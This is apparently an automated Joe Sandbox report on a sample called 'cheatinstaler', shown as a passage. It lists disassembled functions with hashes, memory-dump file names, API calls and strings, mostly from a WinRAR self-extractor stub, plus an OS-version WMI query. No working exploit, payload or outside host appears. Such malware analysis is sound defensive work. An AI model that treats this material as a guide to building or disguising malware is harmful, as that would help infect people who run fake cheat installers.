                                                                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                  • Instruction Fuzzy Hash: 9AB09220E17A02C2EB482F526C9225422A8BF48702FA88078C18C81330DE2C24B65711
                                                                                                  Function 00007FF6C16F58E0 Relevance: .0, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                  • Instruction ID: 3523ac9e02c5aac514e321283d69f5ca5e41c3026b2a3057fdf09ad3b9d833fd
                                                                                                  • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                  • Instruction Fuzzy Hash: 40F06272B182958BDBA8CF2AA85262977D0FB08381F948039D6CDC3B04DA3CD4618F14
                                                                                                  Function 00007FF6C16BD7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                                  • API String ID: 3668304517-727060406
                                                                                                  • Opcode ID: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
                                                                                                  • Instruction ID: d3ff8d6b3d3494a6ea2d8d858ae4ab0b82e240eb690b6e16b80a9dc189f1f98d
                                                                                                  • Opcode Fuzzy Hash: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
                                                                                                  • Instruction Fuzzy Hash: D241E676B05F0199EB009F62E8403E933A9EB48799F400276DADC87B69EF38D565D380
                                                                                                  Function 00007FF6C16E2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                  • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                                  • Instruction ID: bd94a898724056cbd30db7d25c2911b3d834675f9a3bb03be7a774397682efd2
                                                                                                  • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                                  • Instruction Fuzzy Hash: 1D211B61A09A0381FF64DF67EC656B423A5AF44783F540238CDDE827A1DE3CE565A350
                                                                                                  Function 00007FF6C16C6A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                                  • API String ID: 4097890229-4048004291
                                                                                                  • Opcode ID: 56c6116d5534ddc5b4079fdeed8715d081fed04d0e9eb28ce3c332ce1ff1d7ed
                                                                                                  • Instruction ID: ede54a8e7f5e9a88aa50db0ef7e0017faddefa3f0885c3bc7993f3dca3525142
                                                                                                  • Opcode Fuzzy Hash: 56c6116d5534ddc5b4079fdeed8715d081fed04d0e9eb28ce3c332ce1ff1d7ed
                                                                                                  • Instruction Fuzzy Hash: 2512E162B08A4280EF10EF6AD4601AD6371EB85B89F504236DBDD87BE9DF3CD546D344
                                                                                                  Function 00007FF6C16DA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                  • API String ID: 431506467-1315819833
                                                                                                  • Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                                  • Instruction ID: d4b33e410a9b3395734951a203a2ce190ffa7952822cccea7b1401f6f1a3a72a
                                                                                                  • Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                                  • Instruction Fuzzy Hash: 0AB1CC62F0878285FB009FA6D4442BC2362AF85799F504235DEDDA6BDAEF3CE546D340
                                                                                                  Function 00007FF6C16EE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                  • API String ID: 3215553584-2617248754
                                                                                                  • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                                  • Instruction ID: c14e8604c51307c9ea8fcd4979a87c4d24b12aaef4bbbd6c738c6885817b6751
                                                                                                  • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                                  • Instruction Fuzzy Hash: 1241AD72A0AB4589EB00CF26E8517ED33A4EB18398F014636EEDC87B94DE3DD125D384
                                                                                                  Function 00007FF6C16DF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                                  • String ID: STATIC
                                                                                                  • API String ID: 781704138-1882779555
                                                                                                  • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                                  • Instruction ID: bb95cb7555515c9c6e469ad9618e384921a9210515e1ff2e60ac5552cb90d485
                                                                                                  • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                                  • Instruction Fuzzy Hash: 6D31B225B09A4286FB61EF13A5647B96391BF89BD2F200430DDCD87B57DE3CE4068740
                                                                                                  Function 00007FF6C16D6E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                  • API String ID: 2721297748-1533471033
                                                                                                  • Opcode ID: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
                                                                                                  • Instruction ID: 077a0092f2ede358ad47f6862836443e04c85324cdac13626b256614f1b088d8
                                                                                                  • Opcode Fuzzy Hash: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
                                                                                                  • Instruction Fuzzy Hash: FC81A362F18A4285FB00EFB6D8402ED6372AF4978AF504235DEDD976DAEE38D506D340
                                                                                                  Function 00007FF6C16DAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$Text
                                                                                                  • String ID: LICENSEDLG
                                                                                                  • API String ID: 1601838975-2177901306
                                                                                                  • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                                  • Instruction ID: c508bdaf594e85de686584f29d63c106e1abe829fdd7a420d2ad4b85f1aaad96
                                                                                                  • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                                  • Instruction Fuzzy Hash: 7A418E25A0CA5282FB10DF17E82477963A1AF84F82F244035D9CE83B96CF3CE586E310
                                                                                                  Function 00007FF6C16CB9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                  • API String ID: 2915667086-2207617598
                                                                                                  • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                                  • Instruction ID: a1280f10791516e41e14ce6691803e31974054c0cebc6fa9a1a873e52389a26e
                                                                                                  • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                                  • Instruction Fuzzy Hash: 4D313320B09A4680EB24EF6BA86427923A0FF44B93F141135DDDE837A5EF3CE945A344
                                                                                                  Function 00007FF6C16D87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: $
                                                                                                  • API String ID: 3668304517-227171996
                                                                                                  • Opcode ID: 7957b1f7c23d8b99e8b957fd2374c8a83d1170bc9397b993806739df2f8497c6
                                                                                                  • Instruction ID: 475e3f6fa3b28257aa0fd264127c3d2e6787f85abab7f9459f148bc0deba4ab9
                                                                                                  • Opcode Fuzzy Hash: 7957b1f7c23d8b99e8b957fd2374c8a83d1170bc9397b993806739df2f8497c6
                                                                                                  • Instruction Fuzzy Hash: 78F1D262F14B4680EF00AF6AD4581BC2366AF54B99F605231CAED977D9DF7CE1A0E340
                                                                                                  Function 00007FF6C16E57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2940173790-393685449
                                                                                                  • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                                  • Instruction ID: 395f4eb17ff4522666addafcbb703ad4a9f9be1afb6d84594586ac3a579da637
                                                                                                  • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                                  • Instruction Fuzzy Hash: C1E1AE76908782CAE7109F26D8903AD77A0FF45B59F144335EACC87696CF38E685D780
                                                                                                  Function 00007FF6C16C4F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocClearStringVariant
                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                  • API String ID: 1959693985-3505469590
                                                                                                  • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                                  • Instruction ID: 27789a1e25b6b74c6d2b9a1a3bfdbff1b44be62d671dfe3a84821797f85f1398
                                                                                                  • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                                  • Instruction Fuzzy Hash: 1B712B36B14A05C6EB20DF26D8906AD77B4FB88B99B445132EADD87B68CF3CD154D300
                                                                                                  Function 00007FF6C16E72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E7371
                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E737F
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E73A9
                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E73EF
                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF6C16E74F3,?,?,?,00007FF6C16E525E,?,?,?,00007FF6C16E5219), ref: 00007FF6C16E73FB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                                  • Instruction ID: 36e90b20205fd1ba874485b20681ee92483cc42d2356e2fdd48e926b2f071dec
                                                                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                                  • Instruction Fuzzy Hash: 8F31D021A1AA4281EF51AF07AC006796394FF48BA2F194735DDED8B380DF3CE554A790
                                                                                                  Function 00007FF6C16E1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
